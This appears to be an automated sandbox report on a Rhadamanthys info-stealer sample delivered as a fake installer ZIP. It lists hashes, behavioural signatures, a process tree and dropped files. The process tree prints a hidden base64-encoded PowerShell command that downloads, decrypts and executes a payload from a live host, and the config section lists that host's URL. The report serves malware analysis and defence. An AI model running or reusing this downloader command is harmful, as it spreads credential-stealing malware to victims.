Analysis
-
max time kernel
538s -
max time network
452s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
27-03-2024 16:03
Static task
static1
Behavioral task
behavioral1
Sample
x32_x64_installer.zip
Resource
win10v2004-20240226-en
Behavioral task
behavioral2
Sample
password.jpg
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
setup.zip
Resource
win10v2004-20240226-en
General
-
Target
x32_x64_installer.zip
-
Size
7.5MB
-
MD5
fe483e12016e3ade9e0a3e692dfb1de7
-
SHA1
0d65b99ef00c0938802c8f65f232deae7bcfc281
-
SHA256
41578e9927574558d723c7680f303e145d0ec2fe7543fbbb2a9ec0bd7d82979d
-
SHA512
e45f193771bc711fe09c5d2d59ab61f2bf22e38cf6850b7784dcd799845b4550e2097719d271a53d1a8e7a57427817133722fcfb4dc3820ccaa98d408346f753
-
SSDEEP
196608:iH+809v9oINYgQfL4ceSl+pQ0qc/Fbqd/NEoZpLyx4U3u:W+/FWISgW3GQBc/FbGExx+
Malware Config
Extracted
https://curlhub.monster/newdrop.bs64
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
explorer.exedescription pid Process procid_target PID 4860 created 2896 4860 explorer.exe 50 -
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 443 1072 powershell.exe 444 1072 powershell.exe 485 2100 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
gpg.exesvchost.exepid Process 4500 gpg.exe 2156 svchost.exe -
Loads dropped DLL 27 IoCs
Processes:
MsiExec.exegpg.exeMsiExec.exeMsiExec.exeMsiExec.exepid Process 1376 MsiExec.exe 1376 MsiExec.exe 1376 MsiExec.exe 1376 MsiExec.exe 1376 MsiExec.exe 1376 MsiExec.exe 4500 gpg.exe 4500 gpg.exe 4500 gpg.exe 4500 gpg.exe 4500 gpg.exe 4500 gpg.exe 4056 MsiExec.exe 4056 MsiExec.exe 4056 MsiExec.exe 4056 MsiExec.exe 4056 MsiExec.exe 1004 MsiExec.exe 1004 MsiExec.exe 1004 MsiExec.exe 1004 MsiExec.exe 1004 MsiExec.exe 2784 MsiExec.exe 2784 MsiExec.exe 2784 MsiExec.exe 2784 MsiExec.exe 2784 MsiExec.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exemsiexec.exemsiexec.exemsiexec.exedescription ioc Process File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe -
Drops file in System32 directory 11 IoCs
Processes:
svchost.exedescription ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
gpg.exedescription pid Process procid_target PID 4500 set thread context of 4860 4500 gpg.exe 137 -
Drops file in Windows directory 32 IoCs
Processes:
msiexec.exedescription ioc Process File opened for modification C:\Windows\Installer\MSID952.tmp msiexec.exe File created C:\Windows\Installer\e59d6e2.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI633A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8935.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID6B0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID82A.tmp msiexec.exe File created C:\Windows\Installer\e59d6de.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSID73C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID8A4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID903.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI8A9F.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSIEA2D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID9FF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI6399.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI88A7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8B4C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID77D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI64D2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDA3E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI62FA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8984.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID5F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID661.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID6EF.tmp msiexec.exe File opened for modification C:\Windows\Installer\e59d6de.msi msiexec.exe File created C:\Windows\Installer\SourceHash{0A6C4E0B-599B-45A1-852F-9E5AF85901A1} msiexec.exe File opened for modification C:\Windows\Installer\MSI625C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI62AB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI89C3.tmp msiexec.exe -
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 4968 4860 WerFault.exe 137 4856 4860 WerFault.exe 137 5068 4860 WerFault.exe 137 -
Modifies registry class 1 IoCs
Processes:
mspaint.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings mspaint.exe -
Suspicious behavior: EnumeratesProcesses 24 IoCs
Processes:
mspaint.exepowershell.exemsiexec.exepowershell.exeexplorer.exedialer.exepid Process 2160 mspaint.exe 2160 mspaint.exe 1072 powershell.exe 1072 powershell.exe 1072 powershell.exe 4064 msiexec.exe 4064 msiexec.exe 2100 powershell.exe 2100 powershell.exe 2100 powershell.exe 2100 powershell.exe 2100 powershell.exe 4064 msiexec.exe 4064 msiexec.exe 4860 explorer.exe 4860 explorer.exe 3280 dialer.exe 3280 dialer.exe 3280 dialer.exe 3280 dialer.exe 4064 msiexec.exe 4064 msiexec.exe 4064 msiexec.exe 4064 msiexec.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
OpenWith.exepid Process 4896 OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exepowershell.exedescription pid Process Token: SeShutdownPrivilege 4208 msiexec.exe Token: SeIncreaseQuotaPrivilege 4208 msiexec.exe Token: SeSecurityPrivilege 4064 msiexec.exe Token: SeCreateTokenPrivilege 4208 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4208 msiexec.exe Token: SeLockMemoryPrivilege 4208 msiexec.exe Token: SeIncreaseQuotaPrivilege 4208 msiexec.exe Token: SeMachineAccountPrivilege 4208 msiexec.exe Token: SeTcbPrivilege 4208 msiexec.exe Token: SeSecurityPrivilege 4208 msiexec.exe Token: SeTakeOwnershipPrivilege 4208 msiexec.exe Token: SeLoadDriverPrivilege 4208 msiexec.exe Token: SeSystemProfilePrivilege 4208 msiexec.exe Token: SeSystemtimePrivilege 4208 msiexec.exe Token: SeProfSingleProcessPrivilege 4208 msiexec.exe Token: SeIncBasePriorityPrivilege 4208 msiexec.exe Token: SeCreatePagefilePrivilege 4208 msiexec.exe Token: SeCreatePermanentPrivilege 4208 msiexec.exe Token: SeBackupPrivilege 4208 msiexec.exe Token: SeRestorePrivilege 4208 msiexec.exe Token: SeShutdownPrivilege 4208 msiexec.exe Token: SeDebugPrivilege 4208 msiexec.exe Token: SeAuditPrivilege 4208 msiexec.exe Token: SeSystemEnvironmentPrivilege 4208 msiexec.exe Token: SeChangeNotifyPrivilege 4208 msiexec.exe Token: SeRemoteShutdownPrivilege 4208 msiexec.exe Token: SeUndockPrivilege 4208 msiexec.exe Token: SeSyncAgentPrivilege 4208 msiexec.exe Token: SeEnableDelegationPrivilege 4208 msiexec.exe Token: SeManageVolumePrivilege 4208 msiexec.exe Token: SeImpersonatePrivilege 4208 msiexec.exe Token: SeCreateGlobalPrivilege 4208 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe Token: SeTakeOwnershipPrivilege 4064 msiexec.exe Token: SeRestorePrivilege 4064 msiexec.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
msiexec.exemsiexec.exemsiexec.exemsiexec.exepid Process 4208 msiexec.exe 4208 msiexec.exe 4208 msiexec.exe 1004 msiexec.exe 1004 msiexec.exe 2184 msiexec.exe 2184 msiexec.exe 1932 msiexec.exe 1932 msiexec.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
mspaint.exeOpenWith.exepid Process 2160 mspaint.exe 4896 OpenWith.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
msiexec.exeMsiExec.exegpg.exeexplorer.exedescription pid Process procid_target PID 4064 wrote to memory of 1376 4064 msiexec.exe 131 PID 4064 wrote to memory of 1376 4064 msiexec.exe 131 PID 4064 wrote to memory of 1376 4064 msiexec.exe 131 PID 1376 wrote to memory of 1072 1376 MsiExec.exe 132 PID 1376 wrote to memory of 1072 1376 MsiExec.exe 132 PID 1376 wrote to memory of 1072 1376 MsiExec.exe 132 PID 4064 wrote to memory of 4500 4064 msiexec.exe 134 PID 4064 wrote to memory of 4500 4064 msiexec.exe 134 PID 4064 wrote to memory of 4500 4064 msiexec.exe 134 PID 4500 wrote to memory of 4860 4500 gpg.exe 137 PID 4500 wrote to memory of 4860 4500 gpg.exe 137 PID 4500 wrote to memory of 4860 4500 gpg.exe 137 PID 4500 wrote to memory of 4860 4500 gpg.exe 137 PID 4860 wrote to memory of 2100 4860 explorer.exe 142 PID 4860 wrote to memory of 2100 4860 explorer.exe 142 PID 4860 wrote to memory of 2156 4860 explorer.exe 145 PID 4860 wrote to memory of 2156 4860 explorer.exe 145 PID 4064 wrote to memory of 4056 4064 msiexec.exe 147 PID 4064 wrote to memory of 4056 4064 msiexec.exe 147 PID 4064 wrote to memory of 4056 4064 msiexec.exe 147 PID 4860 wrote to memory of 3280 4860 explorer.exe 148 PID 4860 wrote to memory of 3280 4860 explorer.exe 148 PID 4860 wrote to memory of 3280 4860 explorer.exe 148 PID 4860 wrote to memory of 3280 4860 explorer.exe 148 PID 4860 wrote to memory of 3280 4860 explorer.exe 148 PID 4064 wrote to memory of 1004 4064 msiexec.exe 157 PID 4064 wrote to memory of 1004 4064 msiexec.exe 157 PID 4064 wrote to memory of 1004 4064 msiexec.exe 157 PID 4064 wrote to memory of 2784 4064 msiexec.exe 159 PID 4064 wrote to memory of 2784 4064 msiexec.exe 159 PID 4064 wrote to memory of 2784 4064 msiexec.exe 159
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2896
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3280
-
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\x32_x64_installer.zip1⤵PID:4964
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:380
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\x32_x64_installer\password.jpg" /ForceBootstrapPaint3D1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2160
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc1⤵
- Drops file in System32 directory
PID:5096
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4896
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\Temp1_setup.zip\setup.msi"1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4208
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 214AE9F4CD283C557065F69C378F3A472⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssDAB9.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiDAB6.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrDAB7.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrDAB8.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
-
C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4500 -
C:\Windows\SysWOW64\explorer.exeexplorer.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwAHMAOgAvAC8AYwB1AHIAbABoAHUAYgAuAG0AbwBuAHMAdABlAHIALwBuAGUAdwBkAHIAbwBwAC4AYgBzADYANAAiACkAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAHgAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBzAC4AUgBlAHAAbABhAGMAZQAoACIAIQAiACwAIgBiACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAEAAIgAsACIAaAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAkACIALAAiAG0AIgApAC4AUgBlAHAAbABhAGMAZQAoACIAJQAiACwAIgBwACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiAF4AIgAsACIAdgAiACkAKQA7AGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJAB4AC4AQwBvAHUAbgB0ADsAJABpACsAKwApAHsAJAB4AFsAJABpAF0APQAgACgAJAB4AFsAJABpAF0AIAAtAGIAeABvAHIAIAAxADYANwApACAALQBiAHgAbwByACAAMQA4AH0AOwBpAGUAeAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAeAApACkA4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2100
-
-
C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe"C:\Users\Admin\AppData\Local\Temp\xKfjBXaCXglJw6E\svchost.exe"4⤵
- Executes dropped EXE
PID:2156
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 21764⤵
- Program crash
PID:4968
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 20564⤵
- Program crash
PID:4856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4860 -s 22004⤵
- Program crash
PID:5068
-
-
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1B751952A4EAAF48E6B7444CBFBA2ED92⤵
- Loads dropped DLL
PID:4056
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding DE333F3D2EED06DA6DDB3E6CC4D792812⤵
- Loads dropped DLL
PID:1004
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0F00D09D91849E4E721713DA635869752⤵
- Loads dropped DLL
PID:2784
-
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\dionegro\setup.msi"1⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:1004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4860 -ip 48601⤵PID:4180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4860 -ip 48601⤵PID:1932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4860 -ip 48601⤵PID:2484
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\dionegro\setup.msi"1⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:2184
-
C:\Windows\System32\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Desktop\dionegro\setup.msi"1⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:1932
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18KB
MD5d178d65fab62e109b9297ffe481924d0
SHA1e8d77c1f8159fec32502744383e2ccdd9eb00041
SHA2566f71db2358e917554552dc1eda451a37afa26b401617be4b8faea4a61249ad26
SHA51281d66a1a3deca273a0fb9851c4cd4586d6388f628d56f483e4753c13922a8ed498c5930eecc48ea128fc20a6131639f5edd61ecd854439aeb9e9b73e2902f9f6
-
Filesize
3KB
MD5b875ceae19b80e8ec3e6c92509595d8b
SHA13fec9e1c06fbf046f9c77adabfb8066604f46c95
SHA2563c20193a0f2a5873e79cdea6bef6cb2940849336019cd45a902f52a7ae35e0e0
SHA51223651e7c645065b7c94c67cbe845347a0e8e3c82ac09be31c44d69d335b4ad12e45ffec5c3041dc8216b060a798065047b275c1eca34117ecc36722a5592d1ce
-
Filesize
3KB
MD5089b2892de707d97266679cb8605ac46
SHA17669e0a4d522059a4a55f33a65a767cda8307217
SHA256545ab7b7ac37eb01c11fc7ff30c35156fc217d0566318535972c318e2fe71c02
SHA51299ce25b570da01a12a7418d849ae795373017e1b8c112659d657ec84e12f738fa5e60861affeccb927024551a3b801a0267999def4f39e18630050eecd434099
-
Filesize
3KB
MD561a47a3c255928cc7b27fc678993648b
SHA12f7af2b373870b16e0907934a7ee84f27c99535e
SHA2560e4d5b95ff605db334ca7c4cee4634490e7219c3c3c0480835765cf0e5a773a0
SHA512ea28e2a7d020f4fe232b37848399a1c2c0cb486eb39bf92b9a75ad67001a36b14b17cc940ba314fbed6f6e81ef157faaf5ebd4454fa1dd3acf27e4d659cf173d
-
Filesize
18KB
MD5a2c1d2cfc324253fe48c917f3a3b37bf
SHA184d6a497073050df2d8482b557135aacd8649284
SHA25675236f965ddb47c26329ac89d4459e2d8f013f3e6e2b73bf02f7405232f6b5db
SHA512238b32897c17bf8cfc58640e3f4a26c689a757e4d9d6f41e083f41100b785a6918252876a12d62d24c8a5bd25ca090c92682072b0764ff68a7e7a95fc7f4c524
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
60B
MD5eb0046beb949b23b97dccd59c4b8f131
SHA1c084a9c15a323cd51d24122681a494e52577487f
SHA256b6594a624b47bcac9a314993f15693e5da2a747adeccff4a996f4ab4491d5467
SHA5128dfdbf11e27242ab14b0997637a9c3deb47d345183c306e0a9b6d62099f4b341dec49f8369bec7ef839e4003d8c7a86267646c9f7c28b8fe9456c3c69b2aeab0
-
Filesize
6KB
MD530c30ef2cb47e35101d13402b5661179
SHA125696b2aab86a9233f19017539e2dd83b2f75d4e
SHA25653094df6fa4e57a3265ff04bc1e970c10bcdb3d4094ad6dd610c05b7a8b79e0f
SHA512882be2768138bb75ff7dde7d5ca4c2e024699398baacd0ce1d4619902402e054297e4f464d8cb3c22b2f35d3dabc408122c207facad64ec8014f2c54834cf458
-
Filesize
542B
MD5753240f3d0c58563dcba1244db69b0d7
SHA14a0f248fccc2431ece50f717cbf80f6681504932
SHA256e77dbd670eaa228e96cb8ab002b0aa7f55a78779fb58754436ec691e6de14e5a
SHA51203987837557d6342280d7871b19472e7c05cabc203824081f6fff38083ecef2da8135642644b598b21ee294816d1ed22d0573db04e5c739b2b08c28f7c441ae9
-
Filesize
1.6MB
MD5a9c5924063a253f64fb86bc924be6996
SHA1c39ba1e011318b3edf295d4bdde3d56b5de89972
SHA256eb1b278b91a8f183f9749948abd9556ec21b03ca852c53e423d824d5d7cc3de4
SHA51257f0f5e8fa907d92feb6175ab32253bfef9f6acf25e5ce3273f12fd428e76a07ec7c8fc007dc2c13dc0c6841222d8874fb7e362d7cbe70f287583782cd3d311e
-
Filesize
1.3MB
MD535365d3713500bde4e2e1422c54f04fa
SHA10b24b1de060caa7be51404d82da5fef05958a1da
SHA2565f7e7bb9b2e73abda7e46bfb8b266dbbb7fd3b87ebb253d842ffcfb56f1efe19
SHA5123e276b947220e56da8798245e9e7a16c9899a3842658ef409518968b137474cba7f13955287d1ff2fa7f929dc3ce75a8fd4c1f5fe58e6edb9e89986080aad375
-
Filesize
154KB
MD5a2dd12a8ecef27ca0e524e9bb4bdb8f5
SHA1a4f5718c8bc1cc1fba49332d767ad296f7156dbc
SHA256e54d43ae67352ceb170ece1fc1a219de9baf70cb71c1bf85a6c52858e2ca0ada
SHA512b35101d5454db885e4f47333365f3d3ce6ed20b94fb75f6965c6e04116967fb5179abaff92a2c20d47b634e81f5ac53e5e1f3def570dd95ae66a3663c0b1ea2c
-
Filesize
576KB
MD5f87ae9852d35b780aeedde438c892b33
SHA11e619647f3153d42852ee4692402ea7482a4b0d0
SHA256f8c672bb71967f5792b62135caad7a5dc7b1c5fc2a7b4875d37e646014a9c65d
SHA5126ec3ec5160bbb96ed7743c4a965f5c98edd51ee0bf42d08ce10902eb75db14e0a3ab09e2175580fd0cea0425e30e000e320d4d4ff0b9a90141efe5fe8c166227
-
Filesize
540KB
MD5f6e0a5fd71de78ba3d635e59fa0b5471
SHA18ffe9980af53668c08a07ff7de1e7dee0749d6a4
SHA2561515801cee7233cb07b7a411586797b68721bdfa1ecbc5a6b9e137045d080e50
SHA512c055654cf580fff3cbd715eee93cd0d2546dffbb338e607795e52286329e661c952c6a8cd52b5a44136cd8cb2fd2be2d98f2fad437432bb915f5fbdd11841a20
-
Filesize
245KB
MD572498f59c8c580707a0a3839c332f51b
SHA1fb09b912912610d243066cc8b71435f689e6a449
SHA25651b69b17a15a4c8df35e81b9eef8b3c8eb914e8208f0ebbe9713661583cddf4d
SHA512116956f25484e01236e5aaac2693e78dbc98e47580ac535a49582e21d69602be23f53f45945b0e94b2b0cf2825832a3e1c1f647302bd7b8398794f5579a0e022
-
Filesize
40KB
MD5b7b148054a2818699d93f96139b4d0d0
SHA10a5187b37bd84c19a7d2d84f328fa0adbc75123c
SHA25625fb8e6bb4ebd62bfa478691261ea2e9486020ef52084dad0fc5ea417338d915
SHA5124f9938a2fb9f6c81cf0dc5d98ecda955e101b5fd52cc43fd58f0072f5ed914c0ef966cd0666c3bcc32f70d52847a5caedea40de86db28c94c8ebd35b366552c1
-
Filesize
768KB
MD550ce7d881dd88eb9728fa9225f3fa938
SHA1616242e243fe334fd997832fd002f331fb1949be
